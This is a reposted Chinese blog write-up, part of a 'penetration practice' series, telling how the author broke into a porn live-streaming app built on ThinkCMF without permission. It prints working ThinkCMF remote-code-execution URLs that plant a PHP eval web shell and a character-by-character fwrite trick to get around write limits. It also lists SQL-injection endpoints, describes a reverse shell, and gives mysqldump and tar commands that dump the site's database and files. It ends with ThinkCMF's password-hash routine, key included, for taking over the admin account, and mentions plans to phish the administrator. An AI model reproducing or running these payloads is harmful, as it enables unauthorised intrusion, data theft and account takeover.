▶【渗透实战系列】|38-对某色情直播渗透

admin 2022年1月9日15:21:54安全文章评论36 views3202字阅读10分40秒阅读模式

免责声明:

本公众号发布的文章均转载自互联网或经作者投稿授权的原创,

文中已注明出处,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 

欢迎各位添加微信号:hackingheibaihong

 关注公众号,加入星球+ 交流群 一起交流、学习安全技术





在一个风和日丽的晚上,正兴奋逛Twitter的我,忽然发现下面推荐关注有这么一个xxxx视频的名片▶【渗透实战系列】|38-对某色情直播渗透


这这这这,我可是正经人,不知道Twitter为啥会给我推送这些。
这必须盘他。
打开推广链接(辣眼睛),下载app

▶【渗透实战系列】|38-对某色情直播渗透


这app一打开就给人一股熟悉的味道,
一看感觉很有可能是tp二开的。

▶【渗透实战系列】|38-对某色情直播渗透


注册手机号fiddler抓包改包,(其实内容更辣眼睛)

▶【渗透实战系列】|38-对某色情直播渗透


抓包获取url发现这不就是thinkcmf吗?满脸淫笑的想这还不拿下,前台那么多rce,就算有狗也能秒之,
然而很快被现实打脸
payload1:

/index.php?g=api&m=Oauth&a=fetch&content=<php>file_put_contents('pass.php','<?php @eval($_POST[1]); ?>')</php>

▶【渗透实战系列】|38-对某色情直播渗透

payload2:

/?a=fetch&;templateFile=public/index&prefix=''&content=<php>file_put_contents('pass.php','<?php  @eval($_POST[1]); ?>')</php>

▶【渗透实战系列】|38-对某色情直播渗透


payload3:

?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b%3F%3E%27);die();?%3E

然后

/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log

最后目录下会生成m.php一句话的,当然也可以写成其他的payload。
已经确认今天的日志文件是存在的

▶【渗透实战系列】|38-对某色情直播渗透


一顿操作猛如虎,一看文件404,难道就要凉凉了?

▶【渗透实战系列】|38-对某色情直播渗透


不怕还有注入
注入点1


/index.php?g=Appapi&m=Video&videoid=1

▶【渗透实战系列】|38-对某色情直播渗透


注入点2.

/index.php?g=Appapi&m=Auth&a=index&uid=128889&token=b69cda34dff2fa978a94b5583e7f5c9a

▶【渗透实战系列】|38-对某色情直播渗透

注入也凉凉,看来我这是要我掏出0day的节奏?算了还是忍忍吧。。。
经过一番鼓捣研究,细节就不贴了,此处省略千字。说多了都是泪
:(:(:(
最后终于出了phpinfo,版本7.2以上
payload:

/?a=fetch&content=<?=phpinfo();exit();

▶【渗透实战系列】|38-对某色情直播渗透


这不离shell更近一步了。


然后看disable_functions禁用这么求多,遇求得到。。。

▶【渗透实战系列】|38-对某色情直播渗透


这里尝试了用


assert

以为成了,结果还是返回1,凉凉~

▶【渗透实战系列】|38-对某色情直播渗透


@assert不得行,这里就可以尝试读取文件file_get_contents,读取数据库配置文件


▶【渗透实战系列】|38-对某色情直播渗透


在继续读取config.php文件


在这里突然想起之前下载app的时候是放在阿里云oss里面的,按理说他的配置文件里面应该有阿里云key和id的,
但现实终究是那么残酷,连aliyun这几个字母都没看到。

▶【渗透实战系列】|38-对某色情直播渗透

读取一些配置文件没有东西,数据库和redis不可外连,于是就准备写个shell上去在仔细翻下。
尝试用file_put_contents

▶【渗透实战系列】|38-对某色情直播渗透


好像不行,难道是参数问题,file_get_contents都能读任意文件的,或者是目录不可写?
尝试写在/tmp/1.txt也是同样的报错,想到php还要其他写文件的函数,于是w3school翻了下


▶【渗透实战系列】|38-对某色情直播渗透


写入123到i.txt,成了

▶【渗透实战系列】|38-对某色情直播渗透

▶【渗透实战系列】|38-对某色情直播渗透

尝试写入php一句话,提示模板不存在,该怎么办?眼看shell到手了快。

▶【渗透实战系列】|38-对某色情直播渗透


仔细看fwrite参数 ,w+是打开写入,r+是追加,难道我要一个字符一个字符写入?
没错,就是要一个字符一个字符写入:L,最终getshell

?a=fetch&content=%[email protected]$fp=fopen(%221.php%22,%27a+%27);%20fwrite($fp,%27<%27);exit();

▶【渗透实战系列】|38-对某色情直播渗透

绕过命令执行,反弹shell

▶【渗透实战系列】|38-对某色情直播渗透


然后打包+脱裤


 mysqldump -h127.0.0.1 -uxxxx -pxxxx xxx >xxx.sql
tar -cvf 1.tar /www/wwwroot/xxx/

▶【渗透实战系列】|38-对某色情直播渗透

以为这就完了 ?
no
看了端口链接以及登陆ip还有搞头,后续待我钓到管理员pc,出续集,另外cmf密码默认加密

<?php
function setPass($pass)
{        
    $authcode = 'rCt52pF2cnnKNB3Hkp';
    $pass = "###" . md5(md5($authcode . $pass));
    return $pass;
}
echo setPass('123456')
?>

进后台的话,明文加密替管理员密文,或者加密明文去撞。
感谢各位老板的支持,感谢同事大佬相助力挺!



往期推荐

【渗透实战系列】|37-6年级小学生把学校的网站给搞了!

【渗透实战系列】|36-一次bc推广渗透实战

【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透

【渗透实战系列】|34-如何用渗透思路分析网贷诈骗链

【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP

【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站

【渗透实战系列】|31-记一次对学校的渗透测试

【渗透实战系列】|30-从SQL注入渗透内网(渗透的本质就是信息搜集)

【渗透实战系列】29|-实战|对某勒索APP的Getshell

【渗透实战系列】28|-我是如何拿下BC站的服务器

【渗透实战系列】27|-对钓鱼诈骗网站的渗透测试(成功获取管理员真实IP)

【渗透实战系列】26|一记某cms审计过程(步骤详细)

【渗透实战系列】25|一次从 APP 逆向到 Getshell 的过程

【渗透实战系列】24|-针对CMS的SQL注入漏洞的代码审计思路和方法

【渗透实战系列】23|-某菠菜网站渗透实战

【渗透实战系列】22|-渗透系列之打击彩票站

【渗透实战系列】21|一次理财杀猪盘渗透测试案例

【渗透实战系列】20|-渗透直播网站

【渗透实战系列】19|-杀猪盘渗透测试

【渗透实战系列】18-手动拿学校站点 得到上万人的信息(漏洞已提交)

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

【渗透实战系列】|16-裸聊APP渗透测试

【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点

【渗透实战系列】|14-对诈骗(杀猪盘)网站的渗透测试

【渗透实战系列】|13-waf绕过拿下赌博网站

【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)

【渗透实战系列】|9-对境外网站开展的一次web渗透实战测试

【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)

【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

【渗透实战系列】|6- BC杀猪盘渗透一条龙(文末附【渗透实战系列】其他文章链接)

【渗透实战系列】|5-记一次内衣网站渗透测试

【渗透实战系列】|4-看我如何拿下BC站的服务器

【渗透实战系列】|3-一次简单的渗透

【渗透实战系列】|2-记一次后门爆破到提权实战案例

【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)





原文始发于微信公众号(Hacking黑白红):▶【渗透实战系列】|38-对某色情直播渗透

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月9日15:21:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  ▶【渗透实战系列】|38-对某色情直播渗透 http://cn-sec.com/archives/729052.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: